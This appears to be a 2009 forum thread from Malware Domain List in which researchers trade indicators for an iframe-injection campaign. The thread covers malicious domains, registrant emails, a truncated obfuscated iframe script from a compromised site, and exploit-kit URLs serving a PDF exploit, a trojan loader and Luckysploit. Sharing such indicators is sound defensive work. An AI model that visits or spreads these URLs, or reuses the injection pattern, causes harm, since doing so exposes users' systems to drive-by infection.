Malware Domain List
Malware Related => Malicious Domains => Topic started by: SysAdMini on May 22, 2009, 12:26:42 pm
-
We should keep an eye on this domain.
I have found
glondis.cn/in.cgi?2
glondis.cn/in.cgi?3
in todays logs. They return an iframe
to
msnewqqer.comand
msnerwqrt.com
Both domains are not registered at the moment, but I'm sure they will.
glondis.cn has been registered at May, 14 and the registrant is an indicator for malware.
Whenever you see the the addresses
Michell.Gregory2009 @yahoo.com / steven_lucas_2000@ yahoo.com
or any combination of the names "Michaell Gregory" and "Steven Lucas" for the registrant, you
probably have found malware.
http://www.malwaredomainlist.com/mdl.php?search=lucas&colsearch=Registrant&quantity=50&inactive=on
http://www.malwaredomainlist.com/mdl.php?search=Gregory2009&colsearch=Registrant&quantity=50&inactive=on
a compromized site which contains an obfuscated iframe to glondis.cn is for example bonsai.pl.
Look at the end of the page.
<script type="text/javascript">document.write('\u003c\u0069\u0066\.......</script></body>
-
can see that megabot[.]cn was previously implicated
Wepawet (http://wepawet.iseclab.org/view.php?hash=81b8132f01a853d6813e5ef5b44e947f&t=1243011797&type=js)
followed by this exploit (also with an iframe)
hxxp://wc-host.in/mix/in.php
Wepawet fail
pdf exploit
hxxp://wc-host.in/mix/pdf.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=320fd15a566aef7320aaa96048a039a8&t=1243105566&type=js)
VirusTotal (http://www.virustotal.com/analisis/98137e7b8aed76d82961a2306a210b3286b19db6761602c02d2d222850fc7d74-1243104891) - 6/40 (15%)
trojan:
hxxp://wc-host.in/mix/load.php
VirusTotal (http://www.virustotal.com/analisis/1dbbfbcf8241a038041036fb2f8a2a1fa5b10955af07cb47f66fb05dc1e86a2d-1243105044) - 12/40 (30%)
The file has the Windows Media Player Icon
-
glondis.cn has a new destination
Luckysploit
http://poppka.net/pore/?7876256053563003de306eb5c094240d